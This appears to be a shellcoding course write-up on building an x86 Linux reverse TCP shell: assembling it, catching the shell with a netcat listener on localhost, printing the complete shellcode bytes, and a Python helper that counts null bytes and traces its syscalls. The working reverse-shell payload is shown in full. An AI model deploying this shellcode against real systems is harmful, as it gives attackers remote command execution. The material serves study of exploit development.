Let's try to compile and run the file, this time the reverse TCP assembly file. For compilation I've been using modified scripts from the SLAE course, to ease the many compilation tasks when adjusting the code.
The used scripts are available from my Github page.
Compile ASM
$ compile_asm.sh rev_tcp_initial
[+] Assembling with Nasm ...
[+] Linking ...
[+] Done!
Preparing a listening port via netcat on terminal one:
nc -lvnp 6666 &
[1] 5581
$ Listening on [0.0.0.0] (family 0, port 6666)
$
Running the ASM binary on terminal two:
$ ./rev_tcp_initial
Checking for output on terminal one:
$ Connection from [127.0.0.1] port 6666 [tcp/*] accepted (family 2, sport 40377)
id
uid=1000(vbox) gid=1000(vbox) groups=1000(vbox),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),107(lpadmin),124(sambashare)
Converting to shellcode for C compilation
$ ../convert_bin_sc.sh rev_tcp_initial
"\xb8\x66\x00\x00\x00\xbb\x01\x00\x00\x00\x6a\x00\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc2\x68\x7f\x01\x01\x01\x66\x68\x1a\x0a\x66\x6a\x02\x89\xe1\xb8\x66\x00\x00\x00\xbb\x03\x00\x00\x00\x6a\x10\x51\x52\x89\xe1\xcd\x80\xb8\x3f\x00\x00\x00\x89\xd3\xb9\x00\x00\x00\x00\xcd\x80\xb8\x3f\x00\x00\x00\x89\xd3\xb9\x01\x00\x00\x00\xcd\x80\xb8\x3f\x00\x00\x00\x89\xd3\xb9\x02\x00\x00\x00\xcd\x80\xb8\x0b\x00\x00\x00\x6a\x00\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb9\x00\x00\x00\x00\xba\x00\x00\x00\x00\xcd\x80"
Yikes! Null bytes again, and all over the place. Time to remove them again. Luckily, most of the ASM code can be reused.
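Before reworking the assembly it helps to check the blob mechanically rather than by eye: how many null bytes there are and where, and which system calls the bytes actually make when the string is handed to a debugger or a sandbox. This is an added example (my code, not one of the SLAE scripts or the post's own tooling) that does both for the string printed above; the syscall names come from the i386 table, and the decoder only knows the handful of x86 encodings this particular shellcode uses.

```python
import re

# Constructed copy of the 127-byte string that convert_bin_sc.sh printed above.
REV_TCP_INITIAL = (
    r"\xb8\x66\x00\x00\x00\xbb\x01\x00\x00\x00\x6a\x00\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc2\x68\x7f"
    r"\x01\x01\x01\x66\x68\x1a\x0a\x66\x6a\x02\x89\xe1\xb8\x66\x00\x00\x00\xbb\x03\x00\x00\x00\x6a\x10"
    r"\x51\x52\x89\xe1\xcd\x80\xb8\x3f\x00\x00\x00\x89\xd3\xb9\x00\x00\x00\x00\xcd\x80\xb8\x3f\x00\x00"
    r"\x00\x89\xd3\xb9\x01\x00\x00\x00\xcd\x80\xb8\x3f\x00\x00\x00\x89\xd3\xb9\x02\x00\x00\x00\xcd\x80"
    r"\xb8\x0b\x00\x00\x00\x6a\x00\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb9\x00\x00\x00\x00"
    r"\xba\x00\x00\x00\x00\xcd\x80"
)
# i386 syscall numbers and socketcall sub-calls this blob uses; "mov r32, imm32" is opcode 0xb8 + register index.
SYSCALLS = {0x66: "socketcall", 0x3f: "dup2", 0x0b: "execve"}
SOCKETCALLS = {1: "SYS_SOCKET", 3: "SYS_CONNECT"}
REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

def parse_escaped(s):
    """Turn the C-style "\\xNN\\xNN..." string into raw bytes."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", s))

def null_offsets(code):
    """Every 0x00 byte terminates a C string early, so each offset listed here is a defect."""
    return [i for i, b in enumerate(code) if b == 0]

def trace_syscalls(code):
    """Report (offset, name) for each int 0x80, using a tiny decoder that covers only the
    encodings this shellcode uses (mov r32,imm32; push imm; mov r32,r32; int). Unknown
    bytes are stepped over one at a time, so treat the result as a heuristic."""
    regs, out, i = {}, [], 0
    while i < len(code):
        op = code[i]
        nxt = code[i + 1] if i + 1 < len(code) else -1
        if 0xb8 <= op <= 0xbf and i + 4 < len(code):      # mov r32, imm32: remember the value
            regs[REGS[op - 0xb8]] = int.from_bytes(code[i + 1:i + 5], "little")
            i += 5
        elif op == 0x66 and nxt in (0x68, 0x6a):          # 66 68 imm16 / 66 6a imm8
            i += 4 if nxt == 0x68 else 3
        elif op in (0x68, 0x6a):                           # push imm32 / push imm8
            i += 5 if op == 0x68 else 2
        elif op == 0x89 and nxt >= 0xc0:                   # mov r32, r32 (register-only modrm)
            i += 2
        elif op == 0xcd and nxt == 0x80:                   # int 0x80: name the call from eax/ebx
            name = SYSCALLS.get(regs.get("eax"), "unknown")
            if name == "socketcall":
                name += "/" + SOCKETCALLS.get(regs.get("ebx"), "?")
            out.append((i, name))
            i += 2
        else:                                              # push reg, stray prefix, or unknown
            i += 1
    return out
```

For this blob `null_offsets` reports 44 nulls out of 127 bytes, and `trace_syscalls` yields socket, connect, three dup2 calls and execve in that order, which is exactly the reverse shell the netcat session above showed.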